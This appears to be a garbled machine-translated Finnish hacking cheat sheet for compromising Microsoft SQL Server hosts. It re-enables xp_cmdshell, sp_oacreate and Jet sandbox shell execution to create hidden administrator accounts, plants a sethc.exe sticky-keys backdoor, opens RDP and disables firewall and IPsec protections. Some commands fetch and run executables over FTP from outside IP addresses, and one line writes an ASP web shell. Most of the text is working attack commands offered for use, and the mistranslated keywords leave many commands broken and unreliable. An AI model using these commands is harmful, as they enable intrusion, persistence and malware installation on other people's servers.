Vuoden 1433 korjausmääräykset
net user SQLDebugger list /add
net localgroup administrators SQLDebugger /add
Virheilmoitus: Tallennettua proseduuria 'master.. xp_cmdshell'。
Korjausmenetelmä: hyvin yleinen, itse asiassa muut 126 127 voidaan korjata yhdessä,
Paitsi xplog70.dll kaikki muu voidaan korjata tällä komennolla
xp_cmdshell uusia palautusmenetelmiä
Vaihe 1: Poista:
Pudotusmenettely sp_addextendedproc
Pudotusmenettely sp_oacreate
Johtaja sp_dropextendedproc 'xp_cmdshell'
Palvelin: Msg 3701, Taso 11, Tila 5, Rivi 1
Prosessia 'sp_addextendedproc' ei voi poistaa, koska sitä ei ole järjestelmähakemistossa.
Palvelin: Msg 3701, taso 11, tila 5, menettely sp_dropextendedproc, rivi 18
Prosessia 'xp_cmdshell' ei voi poistaa, koska sitä ei ole järjestelmähakemistossa.
Vaihe 2: Toipuminen:
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
Suora toipuminen, riippumatta siitä, onko sp_addextendedproc olemassa vai ei
xplog70.dll korjaukset:
Virheilmoitus: DLL-xplog70.dll tai jokin DLL:n viittaamista DLL:istä ei voitu asentaa. Syy: 126 (Määriteltyä moduulia ei löydy.) )。
Korjaa XPLOG70.DLL (tarkista ensin varmuuskopiohakemisto \x86\bin tiedoston mukana ja korvaa sitten seuraava hakemisto)
Vaihe 1
Johtaja sp_dropextendedproc 'xp_cmdshell'
Vaihe 2
dbcc addextendedproc ("xp_cmdshell","c:\sql2ksp4\x86\binn\xplog70.dll")
Tallennetun menettelyn 'master.. xp_cmdshell'。
Vaihe 1:
Luo menettely sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (omistaja.) Kutsuttavan funktion nimi
*/
@dllname varchar(255)/* DLL:n nimi, joka sisältää funktion */
kuten
Käynnistä implicit_transactions
jos @@trancount > 0
Aloita
raiserror(15002,-1,-1,'sp_addextendedproc')
Paluu (1)
loppu
dbcc addextendedproc( @functname, @dllname)
Paluu (0) -- sp_addextendedproc
MENE
Vaihe 2:
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
SQL Server esti pääsyn prosessin 'sys.xp_cmdshell'-komponenttiin 'xp_cmdshell', koska tämä komponentti suljettiin osana tämän palvelimen tietoturvakonfiguraatiota. Järjestelmänvalvojat voivat ottaa käyttöön 'xp_cmdshell' käyttämällä sp_configure. Lisätietoja xp_cmdshell käyttöönotosta löytyy SQL Server Online Books -sarjan Peripheral App Configuratorista.
; EXECUTIVE sp_configure 'näytä edistyneet asetukset', 1 --
; KONFIGUROI UUDELLEEN OHITUKSELLA --
; JOHTAJA sp_configure 'xp_cmdshell', 1 --
; KONFIGUROI UUDELLEEN OHITUKSELLA --
; EXECUTIVE sp_configure 'näytä edistyneet asetukset', 0 --
Poista SQL vaarallinen tallennustila:
PUDOTUSMENETTELY sp_makewebtask
Toimitusjohtaja.. sp_dropextendedproc xp_cmdshell
Toimitusjohtaja.. sp_dropextendedproc xp_dirtree
Toimitusjohtaja.. sp_dropextendedproc xp_fileexist
Toimitusjohtaja.. sp_dropextendedproc xp_terminate_process
Toimitusjohtaja.. sp_dropextendedproc sp_oamethod
Toimitusjohtaja.. sp_dropextendedproc sp_oacreate
Toimitusjohtaja.. sp_dropextendedproc xp_regaddmultistring
Toimitusjohtaja.. sp_dropextendedproc xp_regdeletekey
Toimitusjohtaja.. sp_dropextendedproc xp_regdeletevalue
Toimitusjohtaja.. sp_dropextendedproc xp_regenumkeys
Toimitusjohtaja.. sp_dropextendedproc xp_regenumvalues
Toimitusjohtaja.. sp_dropextendedproc sp_add_job
Toimitusjohtaja.. sp_dropextendedproc sp_addtask
Toimitusjohtaja.. sp_dropextendedproc xp_regread
Toimitusjohtaja.. sp_dropextendedproc xp_regwrite
Toimitusjohtaja.. sp_dropextendedproc xp_readwebtask
Toimitusjohtaja.. sp_dropextendedproc xp_makewebtask
Toimitusjohtaja.. sp_dropextendedproc xp_regremovemultistring
Toimitusjohtaja.. sp_dropextendedproc sp_OACreate
PUDOTUSMENETTELY sp_addextendedproc
Palauta laajennetut tallennetut proseduurit
Palauta sp_addextendedproc ensin, lause on seuraava:
Ensiksi:
Luo menettely sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (omistaja.) kutsuttavan funktion nimi */ @dllname varchar(255)/* DLL:n nimi, joka sisältää funktion */ muodossa
Käynnistä implicit_transactions
jos @@trancount > 0
Aloita
raiserror(15002,-1,-1,'sp_addextendedproc')
Paluu (1)
loppu
dbcc addextendedproc( @functname, @dllname)
Paluu (0) -- sp_addextendedproc
MENE
Toinen:
Käytä masteria
Exec sp_addextendedproc xp_cmdshell, 'xp_cmdshell.dll'
Exec sp_addextendedproc xp_dirtree, 'xpstar.dll'
Exec sp_addextendedproc xp_enumgroups, 'xplog70.dll'
Exec sp_addextendedproc xp_fixeddrives, 'xpstar.dll'
Exec sp_addextendedproc xp_loginconfig, 'xplog70.dll'
exec sp_addextendedproc xp_enumerrorlogs, 'xpstar.dll'
Exec sp_addextendedproc xp_getfiledetails, 'xpstar.dll'
Exec sp_addextendedproc sp_OACreate, 'odsole70.dll'
Exec sp_addextendedproc sp_OADestroy, 'odsole70.dll'
Exec sp_addextendedproc sp_OAGetErrorInfo, 'odsole70.dll'
Exec sp_addextendedproc sp_OAGetProperty, 'odsole70.dll'
Exec sp_addextendedproc sp_OAMethod, 'odsole70.dll'
Exec sp_addextendedproc sp_OASetProperty, 'odsole70.dll'
Exec sp_addextendedproc sp_OAStop, 'odsole70.dll'
exec sp_addextendedproc xp_regaddmultistring, 'xpstar.dll'
Exec sp_addextendedproc xp_regdeletekey, 'xpstar.dll'
Exec sp_addextendedproc xp_regdeletevalue, 'xpstar.dll'
Exec sp_addextendedproc xp_regenumvalues, 'xpstar.dll'
Exec sp_addextendedproc xp_regread, 'xpstar.dll'
Exec sp_addextendedproc xp_regremovemultistring, 'xpstar.dll'
Exec sp_addextendedproc xp_regwrite, 'xpstar.dll'
Exec sp_addextendedproc xp_availablemedia, 'xpstar.dll'
Poista lause, joka laajentaa tallennettua proseduuria xp_cmdshell:
Johtaja sp_dropextendedproc 'xp_cmdshell'
Palauta cmdshellin sql-lause
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
Avaa cmdshell-SQL-lause
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
Selvitä, onko tallennuslaajennusta olemassa
Valitse count(*) master.dbo.sysobjectsista, missä xtype='x' ja name='xp_cmdshell'
Palautustulos on 1 ja se on ok
Palauta xp_cmdshell
exec master.dbo.addextendedproc 'xp_cmdshell', 'xplog70.dll'; Valitse count(*) master.dbo.sysobjectsista, missä xtype='x' ja name='xp_cmdshell'
Palautustulos on 1 ja se on ok
Muussa tapauksessa lataa xplog7.0.dll
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
Estä cmdshellin SQL-lause
sp_dropextendedproc "xp_cmdshell
Yksi. SA-salasanan vaihtaminen:
Kun olet yhdistänyt SQL Comprehensive Utilization Tooliin, suorita komento:
exec sp_password NULL, 'uusi salasana', 'sa'
(Vinkki: käytä varovasti!)
Kaksi. Korjaa vain heikko salasana.
Menetelmä 1: Kysy jakajaa yhdistämisen jälkeen:
jos on olemassa (valitse * joukosta
dbo.sysobjects, missä id = object_id(N'[dbo].[ xp_cmdshell]') ja
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
johtaja sp_dropextendedproc N'[dbo]. [xp_cmdshell]'
MENE
Sitten paina F5-näppäintä suorittaaksesi käskyn
Menetelmä 2: Kysely sen jälkeen, kun jakaja on yhdistetty
Ensimmäinen vaihe on suorittaa: käytä masteria
Vaihe 2: sp_dropextendedproc 'xp_cmdshell'
Sitten paina F5-näppäintä suorittaaksesi käskyn
DLL xpsql70.dll tai jokin DLL:n viittaamista DLL:istä ei voi asentaa. Syy 126 (Määriteltyä moduulia ei löydy. )
Palautusmenetelmä: Splitter-yhteyden kyselyn jälkeen,
Vaihe 1: sp_dropextendedproc "xp_cmdshell"
Vaihe 2: sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
Funktiota xp_cmdshell ei löydy kirjastosta xpweb70.dll. Syy: 127 (Määriteltyä ohjelmaa ei löydy.) )
Palautusmenetelmä: Splitter-yhteyden kyselyn jälkeen,
Vaihe 1 Toteutus: johtaja sp_dropextendedproc 'xp_cmdshell'
Vaihe 2: johtaja sp_addextendedproc 'xp_cmdshell', 'xpweb70.dll'
Sitten paina F5-näppäintä suorittaaksesi käskyn
Jos mikään yllä mainituista menetelmistä ei ole palautettavissa, kokeile lisätä tili suoraan seuraavilla menetelmillä:
Kun olen kysynyt jakajayhteyttä,
2000servser-järjestelmä:
declare @shell int exec sp_oacreate 'wscrip remove t.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user Web hacker /add'
Declare @shell int exec sp_oacreate 'wscrip remove t.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators Web /add'
XP- tai 2003-palvelinjärjestelmä: 126-virhe! järjestys
deklarare @shell int exec sp_oacreate 'wscrip remove t.shell', @shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user Web$ hacker /add'
deklarare @shell int exec sp_oacreate 'wscrip remove t.shell', @shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators Web$ /add'
C:\>DIR C:\
SQL Server esti pääsyn prosessin 'sys.xp_cmdshell'-komponenttiin 'xp_cmdshell', koska tämä komponentti suljettiin osana tämän palvelimen tietoturvakonfiguraatiota. Järjestelmänvalvojat voivat ottaa käyttöön 'xp_cmdshell' käyttämällä sp_configure. Lisätietoja xp_cmdshell käyttöönotosta löytyy SQL Server Online Books -sarjan Peripheral App Configuratorista.
Analyaattorin suorittamat lauseet:
EXECUTIVE sp_configure 'näytä edistyneet asetukset', 1; RECONFIGURE; EXECUTIVE sp_configure 'xp_cmdshell', 1; RECONFIGURE;
Joskus, kun yllä olevat lauseet suoritetaan kyselyn irrottajayhteydellä, tallennettua menettelyä ei löydy sp_addextendedproc
Kiertotie:
Luo menettely sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (omistaja.) kutsuttavan funktion nimi */
@dllname varchar(255)/* DLL:n nimi, joka sisältää funktion */
kuten
Käynnistä implicit_transactions
jos @@trancount > 0
Aloita
raiserror(15002,-1,-1,'sp_addextendedproc')
Paluu (1)
loppu
dbcc addextendedproc( @functname, @dllname)
Paluu (0) -- sp_addextendedproc
MENE
Tämä koodi liimataan kyselyjakajaan ja suoritetaan
Explorer:
c:\windows\explorer.exe
Katso sisällysluettelo
Exec master.dbo.xp_subdirs 'c:\'
Listalevyt
Toimitusjohtaja.. xp_fixeddrives
xpsql.cpp: 错误 5 来自 CreateProcess(第 737 行) 直接加帐号!
EXECUTIVE master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0
Valitse * OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("verkkokäyttäjä 123 123 /add")');
Valitse * OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators 123 /add")');
echo Windows Registry Editor Version 5.00 >3389.reg
Kaiku. >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
echo "Enabled"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>3389.reg
echo "ShutdownWithoutLogon"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>3389.reg
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
kaikuu [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg
kaiku "TSEnabled"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
kaiku "Start"=dword:00000002 >>3389.reg
kaikua [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>3389.reg
kaiku "Start"=dword:00000002 >>3389.reg
kaiku [HKEY_USERS\. DEFAULT\Näppäimistöasettelu\Kytkin] >>3389.reg
echo "Hotkey"="1" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
kaikua [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
Regedit /s 3389.reg
Avaa 3389:
exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0; --
Passi 3389:
exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',1;
Katso portti 3389
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
Tavallinen CMD:n takaovi
xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\cmd.exe'
win2K menee suoraan PS Marille
Toimitusjohtaja.. xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
Valitse * openrowset('microsoft.jet.oledb.4.0','; database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c @echo open 60.190.176.85>>net.txt&@echo reconditeness>>net.txt&@echo 7259>>net.txt&@echo get 0.exe>>net.txt& @echo hei>>net.txt&@ftp -s:net.txt&del net.txt & 0.exe")')
win03-XP suoraan PS-hevosilla
Toimitusjohtaja.. xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
Valitse * openrowset('microsoft.jet.oledb.4.0','; database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c @echo open 60.190.176.85>>net.txt&@echo reconditeness>>net.txt&@echo 7259>>net.txt&@echo get 0.exe>>net.txt& @echo hei>>net.txt&@ftp -s:net.txt&del net.txt & 0.exe")')
5. Siirrä takaoven komento
deklaroi @o int
exec sp_oacreate 'scrip remove ting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
deklaroi @o int
exec sp_oacreate 'scrip remove ting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
kopioi c:\windows\explorer.exe c:\windows\system32\sethc.exe
kopioi c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
deklaroi @o int
Johtaja sp_oacreate 'wscrip poista t.shell', @o
exec sp_oamethod @o, 'run', NULL, 'XXXXX' \\XXXXX on komento, jonka haluat suorittaa
Kirjoita rekisterissä määriteltyyn avaimeen määritetty arvo) käyttäen metodia (kirjoita bbb avaimeen HKEY_LOCAL_MACHINE\SOFTWARE\aaa\aaaValue):
EXEC-mestari.. xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='OHJELMISTO\AAA',
@value_name='aaaValue',
@type='REG_SZ',
@value='bbb'
@echo auki 121.22.56.5>c:\bin.txt&@echo list>>c:\bin.txt&@echo list>>c:\bin.txt&@echo get gzn.exe>>c:\bin.txt&@echo bye>>c:\bin.txt&@ftp -s:c:\bin.txt&del c:\bin.txt&gzn.exe& gzn.exe&gzn.exe
Ensiksi kopioi ftp.exe wmpub-hakemistoon
@echo CD c:\wmpub\>c:\wmpub\in.bat&@echo ftp -s:c:\wmpub\xiuxiu.txt>>c:\wmpub\in.bat
Open 3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
C:\WINDOWS\system32\dllcache\net1.exe localgroup administrators IUSR_SERVER /add
SQL kirjoittaa lauseen
exec master.dbo.xp_subdirs 'd:\web\cdlxkj';
exec sp_makewebtask 'd:\web\cdlxkj\XX.asp','select''<%execute(request("SB"))%>'' '
SA Sandbox Mode -kampanja -----
----------------------
Toimitusjohtaja.. xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;
-------------------------------------------------------
Valitse * OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net user sql$ 123 /add")');
-------------------------------------------------------
Valitse * OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators sql$ /add")');
3389-VUORO
Lauseessa käytettiin:
Hyökkäys
EXEC-mestari.. xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. EXE',
@value_name='Debugger',
@type='REG_SZ',
@value='C:\WINDOWS\explorer.exe'
Toipuminen
EXEC-mestari.. xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. EXE',
@value_name='Debugger',
@type='REG_SZ',
@value=''
Kuvakaappaus
EXEC-mestari.. xp_regwrite --- tämä on rekisterin muokkausta!
@rootkey='HKEY_LOCAL_MACHINE', ---Tämä on paikka!
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. EXE', -----Tämä on myös se paikka!
@value_name='Debugger', --- tämä on pöydän nimi!
@type='REG_SZ', --- tässä on kirjoittamisen merkitys!
@value='C:\WINDOWS\explorer.exe' ---- tässä on kirjoitettu sisältö!
Koko prosessi on käyttää masteria: xp_regwrite tämä komponentti on valmis,
1.sql komento kysyä, onko rekisterin kiinnitetty avain kaapattu.
Toimitusjohtaja.. xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'
2.sql komento kaappaa rekisterin kiinnitetyn näppäimen toiminnon ja korvaa sen tehtävienhallinnalla (tietysti voit korvata sen muilla haluamillasi komennoilla).
xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe',
'Debugger','REG_SZ','C:\WINDOWS\system32\taskmgr.exe'
3.sql komento poistaa rekisterin kiinnitysavaimen kaappausominaisuus suojaa palvelinta muiden hyväksikäytöltä
xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'
SQL-kirjoitustiedostot
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scrip remove ting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("Wscrip remove t.NETWORK")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork. ComputerName'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Aseta oe=GetObject(os&"/Administrators,group")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Aseta od=ob. Create("user","test")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od. SetPassword "1234"'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od. SetInfo '
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set=GetObject(os&"/test",user) '
exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/test"'
Skriptit ilman NET-eskalaatiota
struser=wscrip poistaa t.arguments(0)
strpass=wscrip poistaakseen t.arguments(1)
set lp=createObject("Wscrip remove t.NETWORK")
oz="WinNT://"&lp. ComputerName
Aseta ob=GetObject(oz)
Aseta oe=GetObject(oz&"/Administrators,group)
Set od=ob.create("user",struser)
OD. SetPassword strpass
OD. SetInfo
Set=GetObject(oz&"/" & struser & ",user")
Oe. Lisäys(of. ADsPath)
Jokaiselle ylläpitäjälle OE:ssa. Jäsenet
if struser=admin. Nimeä sitten
Wscrip poisti t.echo-struserin ja "Perustettu onnistuneesti!"
WSCRIP poistaa t.quit
päättyy jos
Seuraavaksi
Wscrip poista t.echo struser & "Käyttäjän perustaminen epäonnistui!"
Tallenna yllä oleva käyttäjäksi. VBS-tiedosto
Sitten suorita: cscrip poistaaksesi user.vbs-käyttäjätunnuksen salasanan
JET-hiekkalaatikkomoodilla voit ratkaista ongelmia, joita tallennetut proseduurit, kuten XP_cmdshell ja niihin liittyvät dynaamiset linkkikirjastot aiheuttavat. Turvallisuussyistä järjestelmä ei käynnistä hiekkalaatikkotilaa oletuksena, mikä vaatii xp_regwrite hiekkalaatikkotilan käyttöönottoa:
Johtaja master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0
\Moottorit','Hiekkalaatikkotila','REG_DWORD',1
Suorita sitten hiekkalaatikkokomento lisätäksesi käyttäjänimen testin salasanalla 1234 järjestelmään:
Valitse * openrowset('microsoft.jet.oledb.4.0','; database=c:\windows
\system32\ias\ias.mdb','valitse shell ("cmd.exe /c net user test 1234 /add")')
Valitse * openrowset('microsoft.jet.oledb.4.0','; database=c:\windows
\system32\ias\ias.mdb','valitse shell("cmd.exe /c net localgroup
ylläpitäjät testaavat /add")')
Eri käyttöjärjestelmillä on erilaiset reitit ja niitä täytyy muokata tilanteen mukaan:
NT/2K: c:\winnt\system32\
XP/2003: c:\windows\system32\
Lisäksi Microsoft SQL Server 2005:ssa jotkut tallennetut proseduurit ovat oletuksena suljettuja ja vaativat komentoja avatakseen:
Käynnistä XP_cmdshell:
EXECUTIVE sp_configure 'näytä edistyneet asetukset', 1; RECONFIGURE; JOHTAJA sp_configure
'xp_cmdshell', 1; RECONFIGURE;
Avaa 'OPENROWSET':
exec sp_configure 'näytä edistyneet asetukset', 1; RECONFIGURE; Johtaja sp_configure
'Ad hoc -jakelukyselyt', 1; RECONFIGURE;
Laita päälle 'sp_oacreate':
exec sp_configure 'näytä edistyneet asetukset', 1; RECONFIGURE; Johtaja sp_configure
'Ole Automation Procedures',1; RECONFIGURE;
Tässä muutama tilanne, joissa suorituskäsky SA:ssa on väärä:
1. DLL-xpsql70.dll tai DLL:n viitaama DLL ei ole ladattavissa. Syy 126 (Määriteltyä moduulia ei löydy. )
Tämä tilanne on melko yleinen, ja korjaus on yksinkertainen ja yksinkertainen, mutta siihen liittyy olosuhteita. Jos voit listata hakemiston tässä tapauksessa (sqltools v2.0:ssa on hakemistotoiminto), Onnittelut tästä 80% tilanteesta voidaan korjata, jos voit listata hakemiston, etsi vain xplog70.dll polku ja suorita seuraava komento.
Vaihe 1
exec sp_dropextendedproc 'xp_cmdshell' (tämä komento poistaa alkuperäinen cmdshell, koska se on jo mennyt pieleen)
Vaihe 2
dbcc addextendedproc ("xp_cmdshell","c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll")
; EXECUTIVE sp_configure 'näytä edistyneet asetukset', 0 –
Tämä on tietenkin SQL-komento, joka suoritetaan kyselyanalysaattorilla. c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll toisessa vaiheessa on xplog70.dll:n polku, tämä polku on melko yleinen, jos c-asemalla ei ole sitä, voit löytää muita asemakirjaimia.
2. Funktiota ei löydy xp_cmdshell kirjastosta xpweb70.dll. Syy: 127 (Määriteltyä ohjelmaa ei löydy.) )
Itse asiassa tämä on sama kuin yllä oleva 126, eli cmdshell on väärässä, kunhan löydät varmuuskopion xplog70.dll noudatat yllä olevaa menetelmää korjataksesi sen.
3. Tallennettua menettelyä 'mestari' ei löytynyt. xpcmdshell'
Tässä tapauksessa näen internetissä, että menetelmä on:
Vaihe 1: Poista:
Pudotusmenettely sp_addextendedproc
Pudotusmenettely sp_oacreate
Johtaja sp_dropextendedproc 'xp_cmdshell'
Vaihe 2: Toipuminen:
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
Itse asiassa tämä on edelleen sama kuin yllä, itse asiassa, jos olet varovainen, yllä oleva 126 127 ei löydä tallennettua menettelyä 'master:. xpcmdshell', koska ensimmäinen askel on poistaa cmdshellin tallennettu proseduuri. Tässä tapauksessa seuraa vain yllä mainittua toista vaihetta.
4. Virheilmoitus: SQL Server esti pääsyn prosessin 'sys.xp_cmdshell'-komponenttiin 'xp_cmdshell', koska tämä komponentti suljettiin osana palvelimen tietoturvakonfiguraatiota. Järjestelmänvalvojat voivat ottaa käyttöön 'xp_cmdshell' käyttämällä sp_configure. Lisätietoja xp_cmdshell käyttöönotosta löytyy SQL Server Online Books -sarjan Peripheral App Configuratorista.
Tämä tilanne on yksinkertaisin, koska sinun ei tarvitse miettiä mitään, vaan suoritat vain seuraavan käskyn
; EXECUTIVE sp_configure 'näytä edistyneet asetukset', 1 --
; KONFIGUROI UUDELLEEN OHITUKSELLA --
; JOHTAJA sp_configure 'xp_cmdshell', 1 --
; KONFIGUROI UUDELLEEN OHITUKSELLA --
; EXECUTIVE sp_configure 'näytä edistyneet asetukset', 0 –
Yllä olevan korjauksen jälkeen voit suorittaa komentokäskyn ja alat nostaa voimaasi. Tarkistan yleensä ensin IP-osoitteen, onko kyseessä intranet, ja sitten REG-kyselyllä HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber tarkistaakseni terminaaliportin, ja sitten netstat –an tarkistaakseni, onko pääte auki, ja sitten net-käyttäjän salasana / lisää käyttäjä ja sitten netin paikallisryhmän ylläpitäjät käyttäjä /add Jos kaikki sujuu hyvin, tämä kaataa palvelimen. Mutta prosessissa on monia ongelmia.
1. Nettotehon edistäminen onnistuu, mutta ei voi yhdistää terminaaliin. Seuraavia tilanteita on
(1) Palvelin on intranetissä.
(2) TCP/IP-seulonta.
Suorita ensin seuraava komentokäsky:
cmd /c regedit -e c:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip, vie rekisterin ensimmäinen osa TCP/IP-suodatusta varten
cmd /c regedit -e c:\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip, vie rekisterin toinen osa TCP/IP-suodatusta varten
cmd /c regedit -e c:\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip", vieden kolmannen sijan rekisterissä TCP/IP-suodatuksesta
Sitten palaa c-asemalle 1.reg, 2.reg, 3.reg, lataa 1.reg, 2.reg 3.reg takaisin kovalevylle muokkaamaan, etsi EnableSecurityFilters-kenttä nähdäksesi, onko avainarvo dwordin jälkeen 000000000, jos se on 00000001, se tarkoittaa, että ylläpitäjä on tehnyt TCP/IP-suodatuksen, meidän tarvitsee vain muuttaa 1 0:aan, 2:een. Reg ja 3.reg tekevät samat muutokset.
(3) Laadi IP-suojauspolitiikka.
Suorita cmd-komento: cmd /c net stop policyagent pysäyttääksesi IPSEC Services -palvelun. Kytke terminaali uudelleen.
(4) Ylläpitäjän asettama terminaalin kirjautumisoikeus on käytössä vain määritellylle käyttäjälle.
(5) Palomuuri. Suorita komentokäsky: net stop alg /ynet stop sharedaccess
2. NET-eskalaatio ilmestyy ja pääsy evätään
Voit kokeilla net1-käyttäjäsalasanaa /add Jos net1 myös kieltää pääsyn, voit kopioida shfit-backdoorin ja yrittää suorittaa komentokomennon: copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
kopioi c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
Jos pyydetään, kopioi 1 tiedosto, joka osoittautuu onnistuneeksi. Yhdistä terminaaliin ja paina 5 shift nähdäksesi, mitä tulee näkyviin. Pelaa Kaka Explorerilla, nyt lisää käyttäjä käsin.
3. Nettoeskalaatio tapahtuu pääsyn epäämisvirheellä 5 (korostus)
Tässä tapauksessa sinun ei tarvitse kokeilla net1:tä, voit kokeilla copy shift backdooria, jos kopio pyytää kopioimaan 0-tiedoston, se todistaa, ettei se onnistu. Sitten voit yrittää ladata sen, jos voit ladata sen, voit suoraan lähettää ei-netin virran nostotyökalun, joka julkaistiin jokin aika sitten, ja lisätä käyttäjän. Mutta suurinta osaa näistä tapauksista ei voi ladata, joten asiaa täytyy miettiä. Koska cmd voidaan suorittaa, tiedosto voidaan ladata cmd:n kautta ftp:n kautta, mutta ftp:n perusajatus on pystyä kirjoittamaan tekstiä tai eräajoa. Sitten voit kirjoittaa tekstin tai erän SQL-lauseen kautta.
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scrip remove ting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'C:\1.bat', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'open IP'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'ftp-tili'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'ftp-salasana'
